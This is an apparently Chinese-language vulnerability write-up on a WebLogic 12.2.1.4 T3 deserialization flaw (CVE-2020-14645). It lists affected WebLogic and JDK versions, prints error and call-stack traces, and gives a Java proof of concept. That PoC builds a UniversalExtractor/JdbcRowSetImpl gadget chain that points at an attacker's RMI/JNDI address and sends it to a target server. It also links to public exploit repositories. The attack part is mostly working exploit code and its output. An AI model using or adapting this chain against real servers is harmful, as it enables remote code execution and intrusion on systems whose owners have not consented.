这个影响面不太大,毕竟用12.2.1.4的并不多。
影响版本:
-
Weblogic 12.2.1.4.x
Weblogic 12.2.1.4.0 Coherence 组件特有的类 com.tangosol.util.extractor.UniversalExtractor,因此只能影响 Weblogic 12.2.1.4.x -
JDK < 6u211/7u201/8u191
由于是jndi注入,所以只影响JEP290之前的JDK版本
Demo
Weblogic报错信息:
(Wrapped: com.sun.rowset.JdbcRowSetImpl.databaseMetaData(com.sun.rowset.JdbcRowSetImpl@6e9f27dc)) java.lang.reflect.InvocationTargetException
at com.tangosol.util.Base.ensureRuntimeException(Base.java:324)
at com.tangosol.util.extractor.UniversalExtractor.extract(UniversalExtractor.java:183)
at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)
at java.util.PriorityQueue.siftDown(PriorityQueue.java:688)
Truncated. see log file for complete stacktrace
Caused By: java.lang.reflect.InvocationTargetException
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.tangosol.util.extractor.UniversalExtractor.extractComplex(UniversalExtractor.java:432)
Truncated. see log file for complete stacktrace
Caused By: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634)
at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
Truncated. see log file for complete stacktrace
PoC:
UniversalExtractor universalExtractor = new UniversalExtractor("getDatabaseMetaData()");
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
Class clazz1 = JdbcRowSetImpl.class.getSuperclass();
Field dataSource = clazz1.getDeclaredField("dataSource");
dataSource.setAccessible(true);
dataSource.set(jdbcRowSet,rmiAddress);
ExtractorComparator extractorComparator = new ExtractorComparator(universalExtractor);
PriorityQueue queue = new PriorityQueue(2);
queue.add("1");
queue.add("1");
Class ext = PriorityQueue.class;
Field comparator = ext.getDeclaredField("comparator");
comparator.setAccessible(true);
comparator.set(queue,extractorComparator);
Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = jdbcRowSet;
byte[] payload = Serializables.serialize(queue);
T3ProtocolOperation.send(target, Port,SSL, payload);
调用栈为:
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
extractComplex:432, UniversalExtractor (com.tangosol.util.extractor)
extract:175, UniversalExtractor (com.tangosol.util.extractor)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
siftDownUsingComparator:722, PriorityQueue (java.util)
siftDown:688, PriorityQueue (java.util)
heapify:737, PriorityQueue (java.util)
readObject:797, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1158, ObjectStreamClass (java.io)
readSerialData:2176, ObjectInputStream (java.io)
readOrdinaryObject:2067, ObjectInputStream (java.io)
readObject0:1571, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:73, InboundMsgAbbrev (weblogic.rjvm)
read:45, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:325, MsgAbbrevJVMConnection (weblogic.rjvm)
init:219, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:557, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:666, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:397, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:993, SocketMuxer (weblogic.socket)
readReadySocket:929, SocketMuxer (weblogic.socket)
process:599, NIOSocketMuxer (weblogic.socket)
processSockets:563, NIOSocketMuxer (weblogic.socket)
run:30, SocketReaderRequest (weblogic.socket)
execute:43, SocketReaderRequest (weblogic.socket)
execute:147, ExecuteThread (weblogic.kernel)
run:119, ExecuteThread (weblogic.kernel)
参考
- https://www.cnblogs.com/potatsoSec/p/13307315.html
- https://www.anquanke.com/post/id/210724
- https://github.com/Y4er/CVE-2020-14645
- https://github.com/DaBoQuan/CVE-2020-14645